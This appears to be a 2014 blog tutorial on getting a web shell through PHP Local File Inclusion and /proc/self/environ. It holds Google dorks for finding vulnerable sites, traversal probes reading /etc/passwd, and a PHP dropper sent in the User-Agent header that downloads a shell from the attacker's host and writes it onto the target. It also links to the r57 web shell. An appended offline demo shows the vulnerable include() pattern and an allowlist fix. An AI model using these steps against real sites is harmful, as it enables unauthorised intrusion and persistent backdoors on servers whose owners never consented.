Thursday 20 February 2014

Shell Via LFI And /Proc/Self/Environ

LFI stands for Local File Inclusion: the application passes a request parameter to include() (or require()) without validating it, so an attacker can make the server read, and execute, any file the PHP process can open. Two facts make this more than a file-read bug. First, PHP runs any <?php ... ?> tags it finds in an included file regardless of the file's extension. Second, /proc/self/environ holds the environment of the process serving the request, and when PHP runs as a CGI-style process that environment contains the request headers, including HTTP_USER_AGENT. Putting PHP code in the User-Agent and then including /proc/self/environ therefore executes that code, which is used here to write a web shell onto the server.

I. You need three things:
> A PHP web shell --> r57 is one; any PHP shell works:
http://www.r57.gen.tr/
> A way to set the User-Agent header --> a browser add-on is used below (curl -A "..." works just as well):
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or Firefox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> A web host you control, reachable from the target over HTTP, to serve the shell source from (the shell is stored there as a .txt file, see step V):
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/

II. Google dorks that surface candidate pages (they only find scripts that take a page or file name in the query string; each one still has to be tested as in steps V to VII):
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=

III. In the add-on, create a new user agent and put the following in the User Agent field (this is the probe: if it ever executes, the response turns into a phpinfo() page):
<?php phpinfo(); ?>

IV. The Description field is just the profile name, so put whatever you want, as shown in picture 1.
Clear the other fields, then create a second user agent with this in the User Agent field (it must stay on one line because it travels in an HTTP header; compared with the usual copy of this dropper, $shell is initialised so the .= does not raise an undefined-variable notice, and both handles are closed):
<?php $shell = ''; $file = fopen("urshellname.php", "w+"); $stream = fopen("http://ursitename.com/urshellname.txt", "r"); while (!feof($stream)) { $shell .= fgets($stream); } fwrite($file, $shell); fclose($stream); fclose($file); ?>

It should look like picture 2.

V. Change ursitename.com and urshellname in the code to your own host and file name. Upload the shell to your host as .txt, not .php: if it were .php your host's PHP would execute it instead of serving its source, and the target would download an empty page. Note that the dropper reads an http:// URL with fopen(), so it only works when the target has allow_url_fopen enabled, and it writes urshellname.php into the working directory of the vulnerable script, which must be writable by the PHP process.
To check whether a site is vulnerable, put ../ in the parameter:
http://www.site.com/index.php?id=..%2F

VI. A response containing [function.include], for example "Warning: include(../) [function.include]: failed to open stream", shows that the parameter reaches include() unchanged. This is the PHP 5 warning format and only appears when display_errors is on; a site that shows nothing may still be vulnerable, it just gives no hint. After seeing the warning, replace ../ with /etc/passwd:

VII. If you get the warning again, prefix ../ repeatedly (../../../../etc/passwd, and so on) until the response contains the file itself: lines such as root:x:0:0:root:/root:/bin/bash. That confirms the inclusion. (If the script appends its own suffix to the parameter, such as ".php", these exact paths will not resolve and the passwd contents never appear.) Once /etc/passwd is readable, replace it, keeping the same number of ../ if any were needed, with:
/proc/self/environ

so the URL will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron

The response should now contain a run of VAR=value text that includes your own request headers, HTTP_USER_AGENT among them. That only happens when PHP runs as a CGI-style process (plain CGI, suPHP and similar, common on shared hosts) whose environment is populated from the request. Under mod_php or php-fpm, /proc/self/environ is the server process's own startup environment, or is not readable at all, so even though the include works, this particular route to execution is closed.

VIII. Switch to the first user agent (the one containing <?php phpinfo(); ?>) and reload the /proc/self/environ URL. If the response now contains a phpinfo() page (starting with "PHP Version ...") instead of the literal tag, the server executed the code from your User-Agent.

Dropping the shell works the same way: switch to the second user agent (with the paths fixed as in step V) and reload the /proc/self/environ URL. The dropper fetches urshellname.txt from your host and writes it as urshellname.php in the vulnerable script's working directory.

IX. To reach your shell, include it through the same vulnerable parameter:
http://www.site.com/index.php?id=urshellname.php

If that does not work, the working directory was probably the web root, so request it directly:
http://www.site.com/urshellname.php

X. The shell is in place and you have code execution on the server as the user the PHP process runs as.
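The following is an added example, not code from the original post, that reproduces the mechanism behind steps V to X offline so you can see why it works and what closes it. It shows the vulnerable pattern the dorks hunt for (the request picks the path given to include()), a constructed stand-in for /proc/self/environ whose HTTP_USER_AGENT entry carries a PHP tag, and an allowlist-based include that refuses anything that is not a known page key. The environ contents are constructed, and the pages/ files in the hardened version are hypothetical (they are never opened because the demo only passes it rejected values).

```php
<?php
// Added example, not from the original post. include() executes PHP tags in
// ANY readable file, so a file that mirrors the attacker's User-Agent is an
// execution vector. A constructed stand-in replaces the real /proc/self/environ
// so this runs on any machine with the PHP CLI.

// The vulnerable pattern: the request chooses the path.
// Equivalent to the classic:  include($_GET['id']);
function vulnerable_include(string $page): void
{
    include $page;
}

// Hardened form: the parameter is a key into a fixed map, never a path.
// Unknown keys are refused, so traversal, absolute paths and
// /proc/self/environ can never reach include().
function safe_include(string $page): bool
{
    $allowed = [
        'home'    => __DIR__ . '/pages/home.php',     // hypothetical page files
        'contact' => __DIR__ . '/pages/contact.php',
    ];
    if (!array_key_exists($page, $allowed)) {
        return false;
    }
    include $allowed[$page];
    return true;
}

// Constructed stand-in for /proc/self/environ: NUL-separated KEY=VALUE pairs,
// one of them the User-Agent from the request. A real environ only carries
// HTTP_* variables when PHP runs as a CGI-style process that receives the
// request headers in its environment (see step VII).
$fakeEnviron = tempnam(sys_get_temp_dir(), 'environ');
file_put_contents($fakeEnviron, implode("\0", [
    'PATH=/usr/local/bin:/usr/bin:/bin',
    'HTTP_HOST=www.site.com',
    'HTTP_USER_AGENT=<?php echo "\nPHP from the User-Agent ran on PHP " . PHP_VERSION . "\n"; ?>',
    'QUERY_STRING=id=%2Fproc%2Fself%2Fenviron',
]));

echo "--- vulnerable_include() ---\n";
// The environ text is echoed as inline HTML, then the PHP tag inside it runs.
vulnerable_include($fakeEnviron);

echo "\n--- safe_include() ---\n";
var_dump(safe_include($fakeEnviron));                    // bool(false)
var_dump(safe_include('../../../../proc/self/environ')); // bool(false)
var_dump(safe_include('/etc/passwd'));                   // bool(false)

unlink($fakeEnviron);
```

Run it with the PHP CLI (php demo.php). The first section prints the raw environ text followed by the line produced by the PHP tag, which is exactly what step VIII looks for on a live target; the second section shows that the allowlisted version returns false for every path-shaped value, because the only thing the request can choose is a key in a table the developer wrote.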

Hit like if you have found it useful!
